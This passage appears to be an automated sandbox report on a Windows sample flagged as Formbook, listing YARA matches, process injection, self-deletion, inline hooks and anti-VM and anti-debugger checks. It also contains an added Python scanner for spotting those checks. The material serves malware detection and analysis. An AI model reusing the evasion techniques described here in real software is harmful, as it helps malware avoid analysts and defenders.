          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/4
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
          Source: C:\Users\user\Desktop\2435.exeFile created: C:\Users\user\AppData\Local\Temp\nsq164.tmpJump to behavior
          Source: 2435.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2435.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\2435.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 2435.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\2435.exeFile read: C:\Users\user\Desktop\2435.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exeProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2435.exeProcess created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\2435.exe Unpacked PE file: 1.2.2435.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_73352F60 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_02FCCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_02FCCF6C push eax; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_02FCCF0B push eax; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_02FCCF02 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe Code function: 9_2_02FCE560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exe File created: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE2
          Source: C:\Users\user\Desktop\2435.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\2435.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2435.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000002FB98E4 second address: 0000000002FB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000002FB9B5E second address: 0000000002FB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2435.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4424 Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6936 Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.251588245.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.240720085.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.266735293.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.253512969.0000000008CA8000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Module--
          Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245792621.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.252071585.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.250341918.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\2435.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2435.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\2435.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
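
Two of the evasion fingerprints in this section survive as static byte patterns: the back-to-back rdtsc reads reported by the RDTSC interceptor (whose delta grows under a hypervisor or a single-stepping debugger) and the `mov eax, dword ptr fs:[00000030h]` PEB reads listed below, which are what BeingDebugged and NtGlobalFlag checks start from. The "Binary or memory string" hits from explorer.exe, by contrast, are the sandbox host's own VMware and Hyper-V device names, present in any explorer.exe on such a guest; they describe the environment the sample ran in rather than a check the sample made. The Python below is an added example, not part of the report or of the sandbox's tooling: a byte-pattern scanner for those encodings over a code blob, with a constructed sample that reproduces the report's rdtsc / xor ecx, ecx / add ecx, eax / rdtsc sequence. It matches bytes rather than a disassembly, so its hits are leads to confirm in a disassembler, not proof.

```python
"""Static scan of raw x86/x64 code bytes for two anti-analysis primitives:
back-to-back RDTSC reads (timing checks) and PEB reads via fs:[30h] or
gs:[60h], with a follow-on BeingDebugged (PEB+2) or NtGlobalFlag (PEB+68h)
access where one sits nearby.

Added example, not part of the sandbox report.  Pure byte matching, no
disassembly: a hit inside data or across instruction boundaries is possible,
so confirm findings in a disassembler.  SAMPLE is constructed.
"""

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def _peb_read_at(code, i):
    """Return (length, description) if a PEB read is encoded at offset i."""
    if code[i:i + 6] == b"\x64\xA1\x30\x00\x00\x00":              # mov eax, fs:[30h]
        return 6, "mov eax, fs:[30h] (PEB read, 32-bit)"
    if (code[i:i + 2] == b"\x64\x8B" and i + 7 <= len(code)
            and (code[i + 2] & 0xC7) == 0x05                     # ModRM mod=00 rm=101: disp32
            and code[i + 3:i + 7] == b"\x30\x00\x00\x00"):
        reg = REG32[(code[i + 2] >> 3) & 7]
        return 7, f"mov {reg}, fs:[30h] (PEB read, 32-bit)"
    if code[i:i + 9] == b"\x65\x48\x8B\x04\x25\x60\x00\x00\x00":  # mov rax, gs:[60h]
        return 9, "mov rax, gs:[60h] (PEB read, 64-bit)"
    return None


def _peb_follow_on(chunk):
    """Return (offset, description) of the first PEB field access in chunk."""
    for j in range(len(chunk)):
        b = chunk[j:j + 4]
        if len(b) == 4 and b[:2] == b"\x0F\xB6" and (b[2] & 0xC0) == 0x40 and b[3] == 0x02:
            return j, "BeingDebugged (PEB+2) check"          # movzx r32, byte ptr [r32+2]
        if len(b) >= 3 and b[0] == 0x8A and (b[1] & 0xC0) == 0x40 and b[2] == 0x02:
            return j, "BeingDebugged (PEB+2) check"          # mov r8, byte ptr [r32+2]
        if len(b) == 4 and b[0] == 0x80 and (b[1] & 0xF8) == 0x78 and b[2] == 0x02:
            return j, "BeingDebugged (PEB+2) check"          # cmp byte ptr [r32+2], imm8
        if len(b) >= 3 and b[0] == 0x8B and (b[1] & 0xC0) == 0x40 and b[2] == 0x68:
            return j, "NtGlobalFlag (PEB+68h) read"          # mov r32, [r32+68h]
    return None


def scan_code(code, rdtsc_window=32):
    """Return (findings, timing_pairs); findings are (offset, description)."""
    findings, rdtsc_at = [], []
    i = 0
    while i < len(code):
        if code[i:i + 2] == b"\x0F\x31":                         # rdtsc
            rdtsc_at.append(i)
            findings.append((i, "rdtsc"))
            i += 2
            continue
        hit = _peb_read_at(code, i)
        if hit:
            length, desc = hit
            findings.append((i, desc))
            follow = _peb_follow_on(code[i + length:i + length + 16])
            if follow:
                findings.append((i + length + follow[0], follow[1]))
            i += length
            continue
        i += 1
    # Two rdtsc within the window is the timing-check shape the interceptor reported.
    timing = [(a, b) for a, b in zip(rdtsc_at, rdtsc_at[1:]) if b - a <= rdtsc_window]
    for a, b in timing:
        findings.append((a, f"rdtsc pair {b - a} bytes apart (timing / VM check)"))
    return sorted(findings), timing


# Constructed 32-bit code: the report's rdtsc sequence, then a BeingDebugged
# and an NtGlobalFlag check.  Not bytes from the sample.
SAMPLE = (
    b"\x55\x8B\xEC"                          # push ebp; mov ebp, esp
    b"\x0F\x31\x31\xC9\x01\xC1\x0F\x31"      # rdtsc; xor ecx, ecx; add ecx, eax; rdtsc
    b"\x2B\xC1\x3D\x00\x10\x00\x00"          # sub eax, ecx; cmp eax, 1000h
    b"\x64\xA1\x30\x00\x00\x00"              # mov eax, fs:[30h]
    b"\x0F\xB6\x40\x02\x85\xC0"              # movzx eax, byte ptr [eax+2]; test eax, eax
    b"\x64\x8B\x0D\x30\x00\x00\x00"          # mov ecx, fs:[30h]
    b"\x8B\x41\x68\xC3"                      # mov eax, [ecx+68h]; ret
)

if __name__ == "__main__":
    found, pairs = scan_code(SAMPLE)
    for off, desc in found:
        print(f"{off:#06x}  {desc}")
```

The same scan applied to the unpacked 1_2 image of 2435.exe would locate the rdtsc pairs and fs:[30h] reads the report attributes to functions 1_2_00409A90 and the 00A7xxxx-00B4xxxx range; unlike the sandbox's dynamic interceptor it also finds checks on code paths the run never reached.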
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9B8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9A830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A999BF mov ecx, dword ptr fs:[00000030h] (8 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A999BF mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B34AEF mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9A229 mov eax, dword ptr fs:[00000030h] (9 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
